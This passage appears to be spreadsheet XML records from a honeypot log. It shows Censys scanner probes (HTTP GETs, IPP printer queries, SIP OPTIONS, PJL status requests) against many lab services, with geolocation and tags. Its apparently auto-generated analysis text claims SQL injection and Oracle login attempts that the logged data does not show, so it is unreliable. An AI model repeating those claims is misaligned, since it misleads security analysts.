    <d v="2024-04-16T11:17:32"/>
    <d v="2025-04-30T04:35:11"/>
    <n v="632"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;SIP Endpoint Enumeration"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_IPP_H41&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_IPP_H47&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_IPP_H3&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_RDP_H3&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_NTP_H29&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_IPP_H18&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_SMTP_H36&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_IRC_H29&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_IPP_H5&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_IPP_H8&amp;&amp;SMA-LAB_IRC_H33&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_IRC_H18&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_IPP_H36&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_SIP_H23&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_IRC_H11&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_IRC_H5&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_IPP_H22&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_VNC_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;28980&amp;&amp;5432&amp;&amp;389&amp;&amp;143&amp;&amp;6379&amp;&amp;110&amp;&amp;1521&amp;&amp;25&amp;&amp;3306&amp;&amp;631&amp;&amp;23&amp;&amp;3389&amp;&amp;NA&amp;&amp;123&amp;&amp;1433&amp;&amp;1080&amp;&amp;5900&amp;&amp;443&amp;&amp;6667&amp;&amp;445&amp;&amp;80&amp;&amp;8443&amp;&amp;21&amp;&amp;9100&amp;&amp;35106&amp;&amp;60788&amp;&amp;44378&amp;&amp;44380&amp;&amp;44396"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="141"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MI"/>
    <s v="Michigan"/>
    <s v="Washtenaw"/>
    <s v="Ann Arbor (Old West Side)"/>
    <s v="4984247"/>
    <s v="48104"/>
    <s v="42.2809"/>
    <s v="-83.7489"/>
    <s v="398324"/>
    <s v="Censys, Inc."/>
    <s v="Censys, Inc."/>
    <s v="hosting"/>
    <s v="Censys, Inc"/>
    <s v="2021-09-13"/>
    <s v="CENSY"/>
    <s v="2024-03-29"/>
    <s v="connection&amp;&amp;GET&amp;&amp;request&amp;&amp;stshash&amp;&amp;login&amp;&amp;query&amp;&amp;command&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.182,60046)}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '209.145.61.177', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_HTTPS:{'Host': '5.180.55.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=44485'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '185.234.67.80:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://185.234.67.80:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Host': '38.60.171.39:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=52922'}}&amp;&amp;{Data_HTTPS:{'Host': '193.57.138.110:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '95.164.21.98:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.21.98:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.182,34762)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '38.60.209.6:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.209.6:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=42914'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.37.11:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=54682'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Host': '154.93.37.45:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=60173'}}&amp;&amp;{Data_HTTPS:{'Host': '38.60.171.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.182,46360)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.40.123:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.253.40.123:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.182,60360)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '193.57.136.113:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=58537'}}&amp;&amp;{Data_HTTPS:{'Host': '154.90.63.129:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=48766'}}&amp;&amp;{Data_HTTP:{'Host': '185.250.150.39:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '5.182.38.84:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.182.38.84:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=45844'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.182,48786)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '94.131.113.33:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.113.33:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=57666'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 5.180.55.39:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=51613'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '45.14.244.111:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://45.14.244.111:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 5.253.40.123:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.60.171.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.171.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '154.93.37.45:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a75e:8ab6"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;High"/>
    <s v="The attacker is attempting to scan and exploit various services on a network, likely as part of a reconnaissance and lateral movement phase in a larger attack campaign. They are probing for open ports and vulnerable systems to gain access and potentially escalate privileges. &amp;&amp; No FTP activity detected. No malicious behavior related to FTP services found. Normal system operation. &amp;&amp; No IRC (Internet Relay Chat) activity detected, which may indicate an attempt to use this service for malicious purposes was thwarted. This lack of activity could also imply the attacker did not try to use IRC at all or was unable to connect. Malicious actors often rely on covert communication channels. &amp;&amp; The data suggests that an attempt was made to access the service, but it could not gather any information due to lack of configuration or implementation for LDAP functionality. This might indicate a probing activity from an attacker trying to understand the system's capabilities. The service appears to be non-operational for LDAP purposes. &amp;&amp; Possible SQL injection attempt detected, as the MySQL service is being queried but no actual data is returned. This could indicate an attacker trying to extract or manipulate sensitive information. The absence of returned data may be a sign of an injection attack. &amp;&amp; Unsuccessful login attempts detected for Oracle database services._x000a_Malicious actors are trying to access sensitive information._x000a_This could be part of a larger attack targeting database vulnerabilities. &amp;&amp; A request is made to the website from an IP address, likely as part of a scan or reconnaissance by an automated tool called CensysInspect, attempting to gather information about the server. The user agent string suggests this is not a legitimate browser. This could be the first step in a larger malicious activity. &amp;&amp; This log data suggests a potential reconnaissance scan, where an attacker is gathering information about the system's services and configuration. The user agent indicates it may be a scripted tool or scanning software, rather than a genuine browser. The GET request to the root directory may be an attempt to determine if any specific services are exposed. &amp;&amp; A GET request is being made to a specific URI on the system, possibly attempting to retrieve information or execute malicious code. The User-Agent field contains a suspicious string that may be used for impersonation or identification purposes. This activity could be part of reconnaissance or an initial attack vector. &amp;&amp; A GET request was made to a web server for a favicon, likely as part of reconnaissance or scanning activity. The user-agent string is from CensysInspect, a tool used by security researchers and attackers alike. This may indicate probing for vulnerabilities or testing network exposure."/>
    <s v="Port scanning and enumeration &amp;&amp; LDAP Bruteforce &amp;&amp; Web Scanning &amp;&amp; Scanning GET"/>
  </r>
  <r>
    <x v="268"/>
    <x v="268"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T04:21:09"/>
    <d v="2024-04-10T13:23:00"/>
    <d v="2025-04-30T04:21:09"/>
    <n v="111"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_PJL_H25&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LA